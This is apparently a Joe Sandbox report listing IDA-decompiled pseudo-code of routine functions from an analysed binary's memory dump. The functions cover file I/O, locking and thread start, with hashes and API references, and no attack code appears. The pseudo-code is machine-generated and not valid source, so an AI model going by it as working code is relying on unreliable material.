Uniqueness Score: -1.00%

Function 00413D81, Relevance: 2.6, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00413D81(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t48;
				signed int* _t49;
				intOrPtr _t50;
				struct _CRITICAL_SECTION* _t56;
				signed int _t57;

				_t57 = _a4;
				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0x18;
				EnterCriticalSection(_t56);
				_t33 =  *((intOrPtr*)(_t57 + 8));
				_t43 =  *((intOrPtr*)(_t57 + 0x10));
				_t50 =  *((intOrPtr*)(_t57 + 0x14));
				if(_t43 !=  *((intOrPtr*)(_t33 + 0x10)) || _t50 !=  *((intOrPtr*)(_t33 + 0x14))) {
					_t34 =  *((intOrPtr*)(_t33 + 8));
					_t35 =  *((intOrPtr*)( *_t34 + 0x10))(_t34, _t43, _t50, 0, 0, _t40);
					if(_t35 == 0) {
						_t36 =  *((intOrPtr*)(_t57 + 8));
						 *((intOrPtr*)(_t36 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
						 *((intOrPtr*)(_t36 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
						goto L5;
					}
					goto L3;
				} else {
					L5:
					_a4 = _a4 & 0x00000000;
					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + 8));
					_t35 =  *((intOrPtr*)( *_t38 + 0xc))(_t38, _a8, _a12,  &_a4);
					 *((intOrPtr*)(_t57 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10)) + _a4;
					_t48 =  *((intOrPtr*)(_t57 + 8));
					asm("adc dword [esi+0x14], 0x0");
					 *((intOrPtr*)(_t48 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
					 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
					_t49 = _a16;
					if(_t49 != 0) {
						 *_t49 = _a4;
					}
					L3:
					LeaveCriticalSection(_t56);
					return _t35;
				}
			}

0x00413d85
0x00413d8c
0x00413d90
0x00413d96
0x00413d99
0x00413d9c
0x00413da2
0x00413da9
0x00413db6
0x00413dbc
0x00413dd2
0x00413dd5
0x00413ddb
0x00000000
0x00413ddb
0x00000000
0x00413dde
0x00413dde
0x00413dde
0x00413de5
0x00413df5
0x00413dfb
0x00413dfe
0x00413e04
0x00413e08
0x00413e0e
0x00413e11
0x00413e16
0x00413e1b
0x00413e1b
0x00413dbe
0x00413dc1
0x00413dcc
0x00413dcc

APIs

EnterCriticalSection.KERNEL32(?), ref: 00413D90
LeaveCriticalSection.KERNEL32(?), ref: 00413DC1

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction ID: 574acab8dc6da0f92556d3d590f48fbb046e393e5bca8a27cda65f89530e78df
Opcode Fuzzy Hash: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction Fuzzy Hash: ED2116752007049FCB28CF55E884AA7B7B9FF88711B148A5DE85A8B761C371F941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415BE2, Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00415BE2() {
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t66;
				intOrPtr* _t67;
				void* _t78;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				void* _t85;
				void* _t87;

				L00419240();
				 *((intOrPtr*)(_t85 - 0x10)) = _t87 - 0x88;
				 *(_t85 - 4) = 0;
				_t83 =  *((intOrPtr*)(_t85 + 8));
				 *((intOrPtr*)( *_t83 + 0x10))(_t83, _t78, _t82, _t66);
				 *(_t85 - 4) = 1;
				_t67 =  *((intOrPtr*)(_t85 + 0x14));
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67 + 4))(_t67);
				}
				 *((intOrPtr*)(_t85 + 0x14)) = 0;
				_t91 = _t67;
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67))(_t67, 0x41a530, _t85 + 0x14);
				}
				 *((intOrPtr*)(_t85 - 0x94)) = 0;
				 *((intOrPtr*)(_t85 - 0x90)) = 0;
				 *((char*)(_t85 - 0x1c)) = 1;
				 *((char*)(_t83 + 0x140)) = 0;
				_push( *((intOrPtr*)(_t85 + 0x10)));
				_t80 = E00416828(_t85 - 0x94, _t91,  *((intOrPtr*)(_t85 + 0xc)));
				if(_t80 == 0) {
					 *((char*)(_t83 + 0x140)) = 1;
					_push(_t83 + 0x14c);
					_push(_t83 + 0x149);
					_push(_t83 + 0x148);
					_push( *((intOrPtr*)(_t85 + 0x14)));
					_push(_t83 + 0x10);
					_t47 = E0041817D(_t85 - 0x94); // executed
					_t80 = _t47;
					__eflags = _t80;
					if(_t80 != 0) {
						goto L5;
					} else {
						E004010F2(_t83 + 0xc,  *((intOrPtr*)(_t85 + 0xc)));
						_t56 =  *((intOrPtr*)(_t85 - 0x94));
						__eflags = _t56;
						if(_t56 != 0) {
							 *((intOrPtr*)( *_t56 + 8))(_t56);
						}
						_t57 =  *((intOrPtr*)(_t85 + 0x14));
						__eflags = _t57;
						if(_t57 != 0) {
							 *((intOrPtr*)( *_t57 + 8))(_t57);
						}
						__eflags = _t67;
						if(_t67 != 0) {
							 *((intOrPtr*)( *_t67 + 8))(_t67);
						}
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t50 = 0;
					}
				} else {
					L5:
					_t48 =  *((intOrPtr*)(_t85 - 0x94));
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 =  *((intOrPtr*)(_t85 + 0x14));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49 + 8))(_t49);
					}
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t50 = _t80;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t50;
			}

0x00415be7
0x00415bf5
0x00415bfa
0x00415bfd
0x00415c03
0x00415c06
0x00415c0a
0x00415c0f
0x00415c14
0x00415c14
0x00415c17
0x00415c1a
0x00415c1c
0x00415c2a
0x00415c2a
0x00415c2c
0x00415c32
0x00415c38
0x00415c3c
0x00415c43
0x00415c54
0x00415c58
0x00415c88
0x00415c95
0x00415c9c
0x00415ca3
0x00415ca4
0x00415caa
0x00415cb1
0x00415cb6
0x00415cb8
0x00415cba
0x00000000
0x00415cbc
0x00415cc2
0x00415cc7
0x00415ccd
0x00415ccf
0x00415cd4
0x00415cd4
0x00415cd7
0x00415cda
0x00415cdc
0x00415ce1
0x00415ce1
0x00415ce4
0x00415ce6
0x00415ceb
0x00415ceb
0x00415cee
0x00415cf2
0x00415cf2
0x00415c5a
0x00415c5a
0x00415c5a
0x00415c62
0x00415c67
0x00415c67
0x00415c6a
0x00415c6f
0x00415c74
0x00415c74
0x00415c79
0x00415c7e
0x00415c7e
0x00415c81
0x00415c81
0x00415d18
0x00415d23

APIs

_EH_prolog.MSVCRT ref: 00415BE7

Part of subcall function 0041817D: _EH_prolog.MSVCRT ref: 00418182

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
Instruction ID: f396f6b083a0fa58f5464e9653f63b5c42f30b53b93fa251e57ee2b7c9474d42
Opcode Fuzzy Hash: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
Instruction Fuzzy Hash: A7417B31600709DFCB21DF64C884BDAB7A8AF84304F14449AE40ADB211EB79ED85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00405401, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00405401(intOrPtr __ecx, char __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				intOrPtr* _v16;
				char _v20;
				void* _t11;
				void* _t15;
				intOrPtr _t19;
				void* _t34;

				_t34 = __eflags;
				_v8 = __edx;
				E00411743(_t11,  &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ecx);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x10))();
				_t15 = E00404E67(__ecx,  &_v20, _t34); // executed
				if(_t15 != 0 || _v8 != 0) {
					__eflags = _v16;
					if(__eflags == 0) {
						L8:
						_t25 = _a4;
						__eflags = _a4;
						if(_a4 != 0) {
							E004117FD(_t25,  &_v20);
						}
						goto L4;
					}
					_t19 = E00405112( &_v20, 0, __eflags);
					__eflags = _t19;
					if(_t19 != 0) {
						goto L8;
					}
					_push(4);
					goto L3;
				} else {
					_push(9);
					_push(0);
					E0040976C( &_v20);
					_push(3);
					L3:
					_pop(0);
					L4:
					_push(_v20);
					L004191B0();
					return 0;
				}
			}

0x00405401
0x0040540e
0x00405411
0x0040541a
0x0040541b
0x0040541c
0x0040541d
0x0040541e
0x0040541f
0x00405427
0x0040542e
0x00405453
0x00405456
0x0040546a
0x0040546a
0x0040546d
0x0040546f
0x00405475
0x00405475
0x00000000
0x0040546f
0x0040545d
0x00405462
0x00405464
0x00000000
0x00000000
0x00405466
0x00000000
0x00405435
0x00405435
0x00405437
0x00405438
0x0040543f
0x00405441
0x00405441
0x00405442
0x00405442
0x00405445
0x00405450
0x00405450

APIs

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT ref: 0041174B

Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT ref: 00404FDA
Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT ref: 00404FE2
Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT ref: 00404FEA

??3@YAXPAX@Z.MSVCRT ref: 00405445

Part of subcall function 0040976C: wvsprintfW.USER32(?,00000000,?), ref: 0040978F
Part of subcall function 0040976C: GetLastError.KERNEL32 ref: 004097A0
Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00BC25D8), ref: 004097C8
Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00BC25D8), ref: 004097DD
Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F0
Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F7
Part of subcall function 0040976C: ??2@YAPAXI@Z.MSVCRT ref: 0040980C
Part of subcall function 0040976C: lstrcpyW.KERNEL32 ref: 00409822
Part of subcall function 0040976C: lstrcpyW.KERNEL32 ref: 00409834
Part of subcall function 0040976C: ??3@YAXPAX@Z.MSVCRT ref: 0040983E
Part of subcall function 0040976C: LocalFree.KERNEL32(?), ref: 00409847

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 3247304187-0
Opcode ID: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
Instruction ID: c8cfcf64f4d727165aa460a5e60b04b55843b987d0c6720e9ddf697575640f7a
Opcode Fuzzy Hash: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
Instruction Fuzzy Hash: CD019271504619AEEF10AA6598C1AFF7368EB0034CF10447FF612372C2DA795D898E5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041817D, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041817D(void* __ecx) {
				void* _t17;
				intOrPtr _t26;
				void* _t31;
				intOrPtr _t33;

				_t23 = __ecx;
				L00419240();
				_push(__ecx);
				 *((intOrPtr*)(_t31 - 0x10)) = _t33;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				_t26 =  *((intOrPtr*)(_t31 + 8));
				_t17 = E00417EA2(__ecx, _t26,  *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18))); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t26 + 0x132)) = 1;
				}
				if(_t17 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
					return _t17;
				} else {
					E00415EDA(_t23);
					 *((char*)( *((intOrPtr*)(_t31 + 8)) + 0x136)) = 1;
					 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
					return E004181D6;
				}
			}

0x0041817d
0x00418182
0x00418187
0x0041818b
0x00418190
0x004181a0
0x004181a4
0x004181ad
0x004181af
0x004181af
0x004181bb
0x004181dc
0x004181e7
0x004181bd
0x004181bd
0x004181c5
0x004181cc
0x004181d5
0x004181d5

APIs

_EH_prolog.MSVCRT ref: 00418182

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
Instruction ID: 41c31309152594a5cdc9a94e22e8fdd470941a79d1f82a5d583071a5725c450b
Opcode Fuzzy Hash: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
Instruction Fuzzy Hash: 77F0FF32400248FFDB21CF88C845BDEBBB1EF40324F04865EF80562250C3BDAA90CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004026DD, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026DD(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t25;

				_t13 = _a8;
				if(_t13 == 0) {
					_t25 = _a4;
					if( *(_t25 + 0x20) != 0) {
						E00411282(_t25 + 0x38);
					}
					_t14 =  *(_t25 + 0x20);
					if(_t14 != 0) {
						 *((intOrPtr*)( *_t14 + 8))(_t14);
						 *(_t25 + 0x20) =  *(_t25 + 0x20) & 0x00000000;
					}
					if( *((intOrPtr*)(_t25 + 0x18)) != 0) {
						SetFileAttributesW( *(_t25 + 0x24),  *(_t25 + 0x44)); // executed
					}
					return 0;
				}
				 *0x41e728 = _t13;
				return 0x80004005;
			}

0x004026dd
0x004026e3
0x004026f2
0x004026fa
0x00402706
0x00402706
0x0040270b
0x00402710
0x00402715
0x00402718
0x00402718
0x00402720
0x00402728
0x00402728
0x00000000
0x00402730
0x004026e5
0x00000000

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00402728

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
Instruction ID: bda90a93fc5a79562ae67f98b1e8df01e77ba5ebef7748c498c118ca2824b36e
Opcode Fuzzy Hash: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
Instruction Fuzzy Hash: C4F01731100601DBDB61DF69C988B97B7F4BF48345F04492EE48AE76E0D7B9E885CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00411292, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00411292(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x41e628; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}

0x00411292
0x00411295
0x00411296
0x0041129e
0x004112a0
0x004112a0
0x004112a3
0x004112b5
0x004112c3
0x004112c9

APIs

WriteFile.KERNELBASE(00000008,00000000,?,00000000,00000000,00000008,?,004112EE,00000000,?,00000000,00000000,00000000,?,004124B8,?), ref: 004112B5

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
Instruction ID: 0023b8de25620b55143802bd0f89cc8c2b593093c471a7488b0b9917581c8630
Opcode Fuzzy Hash: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
Instruction Fuzzy Hash: F0E0E575A41209FFDB00CF95D801BDE7BF9EB48354F50C069F9189A260D379AA50DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411359, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411359(signed int* __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				signed int _t9;
				signed int* _t13;

				_t13 = __ecx;
				_t8 = E0041115B(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t13 = _t9;
					return _t9 & 0xffffff00 | _t9 != 0xffffffff;
				}
				return _t8;
			}

0x0041135d
0x0041135f
0x00411366
0x0041137b
0x00411386
0x00000000
0x00411388
0x0041138d

APIs

Part of subcall function 0041115B: FindCloseChangeNotification.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166

CreateFileW.KERNELBASE(0041E7B8,00409A47,00000000,00000000,0041E7B8,004113DB,00000000,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD), ref: 0041137B

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ChangeCloseCreateFileFindNotification
String ID:
API String ID: 727422849-0
Opcode ID: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
Instruction ID: 7f7215a53688679663676b47c899f3015bbad9dd6bad72367c24d06892668cc0
Opcode Fuzzy Hash: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
Instruction Fuzzy Hash: 70E08632000219BBCF111FA49C02BCA3F66AF09360F104626FB11561F1C776C4B0AB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041883F, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041883F(intOrPtr __ecx) {
				void* _t9;
				void* _t14;
				void* _t19;
				intOrPtr _t21;

				L00419240();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				 *((intOrPtr*)(_t19 - 0x14)) = __ecx;
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				_t9 = E004184FC(__ecx, _t14, 0); // executed
				 *(_t19 - 4) =  *(_t19 - 4) | 0xffffffff;
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t9;
			}

0x00418844
0x00418849
0x0041884a
0x0041884e
0x00418851
0x00418854
0x0041885a
0x0041885f
0x00418866
0x00418871

APIs

_EH_prolog.MSVCRT ref: 00418844

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
Instruction ID: 85b5f634bb3876c881f9a369785aad2c034a51649cb27cc2246a7d4990ba049a
Opcode Fuzzy Hash: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
Instruction Fuzzy Hash: 7BE08671900214ABD7149B8AC8077DEBB78EB40765F10425FF01162280D7782E008568

Uniqueness

Uniqueness Score: -1.00%

Function 004071A3, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004071A3(intOrPtr* __ecx, void* __edx, char _a4) {

				__imp___beginthreadex(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *__ecx = 0;
				return E0040715E(0);
			}

0x004071b6
0x004071c1
0x004071ca

APIs

_beginthreadex.MSVCRT ref: 004071B6

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
Instruction ID: 2aa1260f39b219495775a5a96dce83a8c9144485e5dc473d2f94c266e6d0d9a7
Opcode Fuzzy Hash: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
Instruction Fuzzy Hash: 73D05EB29002087FDB00AFA4DC05CBB7A9CDA45260700843ABD48CB301E5729E6087E5

Uniqueness

Uniqueness Score: -1.00%

Function 00411222, Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00411222(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}

0x00411225
0x00411226
0x00411238
0x00411246
0x0041124c

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00411238

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction ID: 592777a0cbf9ed61c554e453f95aac0b5ff3b8d945bf09df7fedf92081e1879d
Opcode Fuzzy Hash: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction Fuzzy Hash: 14E0EC75201208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C7769A20EB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041115B, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041115B(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x0041115c
0x0041115e
0x00411163
0x00411177
0x0041117a
0x00411165
0x00411166
0x0041116e
0x00411174
0x00000000
0x00411170
0x00411173
0x00411173
0x0041116e

APIs

FindCloseChangeNotification.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
Instruction ID: 054d9df42e2342d198a541279ff18f785dd1647d9572a3c5038800ec3afc9341
Opcode Fuzzy Hash: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
Instruction Fuzzy Hash: 0FD01231144521668A641F3C78485D273D86E07330731175AF1B0C33F0D3648CC34654

Uniqueness

Uniqueness Score: -1.00%

Function 00411265, Relevance: 1.5, APIs: 1, Instructions: 9
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00411265(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

